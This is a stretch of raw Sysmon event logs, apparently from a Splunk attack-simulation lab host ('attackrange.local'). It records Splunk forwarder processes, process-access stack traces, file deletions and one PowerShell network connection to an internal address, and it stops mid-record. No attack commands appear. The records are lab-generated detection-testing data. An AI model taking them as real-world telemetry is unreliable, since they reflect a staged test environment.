14:58:31.909{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.909{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.909{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.909{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7297-613B-2CB4-03000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.894{B81B27B7-7297-613B-2CB4-03000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ADB72F12273F5E93FB3003262E4B6BB,SHA256=60E0F2C0E42FC6902400ADEE42A1FA53A54B259D4F3199F5ADB2483060960609,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.393{B81B27B7-7297-613B-2BB4-03000000C801}66885548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.228{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7297-613B-2BB4-03000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.226{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.226{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.226{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.226{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.225{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7297-613B-2BB4-03000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.225{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7297-613B-2BB4-03000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.210{B81B27B7-7297-613B-2BB4-03000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035342199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.593{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7298-613B-2DB4-03000000C801}5268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.593{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.593{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.593{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-7298-613B-2DB4-03000000C801}5268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.593{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.593{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.593{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7298-613B-2DB4-03000000C801}5268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.578{B81B27B7-7298-613B-2DB4-03000000C801}5268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D143D2429230BEB96AD99CA37C4367A,SHA256=D6EE1C083405EF6656C0853C5A142AE15E073AC105F23A9BC7E0EBF4EF776261,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F838D674FD9151A6CA3EAA1900871F52,SHA256=3F700C2513F3CA1A9B975BE5E308B1F18B2ACDC02F0A2656C033D795F482825A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D394672C56C252C0ABDFBDBB14C4560,SHA256=AE600850D3F80029B4EB098826E6C2014C1DBC3180DD45F7CC52999E219D38B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:32.109{B81B27B7-7297-613B-2CB4-03000000C801}54482996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:33.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F838D674FD9151A6CA3EAA1900871F52,SHA256=3F700C2513F3CA1A9B975BE5E308B1F18B2ACDC02F0A2656C033D795F482825A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:33.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A2F6876B1B5DBD38B7460C29C9FDD9,SHA256=09903F44983CA38525E5139A153A579183C676A12927F769DD2E0EB4D5889A9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:33.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7CF49F211C5535F9B197CE0F13374728,SHA256=C93C0AED4FD0F6644D73338365A56E06FF767DE2B3AD1BE7475AE09F5E9898F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:34.528{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E653B5D51389EC7C7973C5A1B9C652EB,SHA256=2EADFC11E1926BE52A11941C90EC7742652FE3BF574EB6813DAC466D20C6FB31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:59.145{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52395-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:35.543{B81B27B7-4024-611D-7300-00000000C801}2188NT 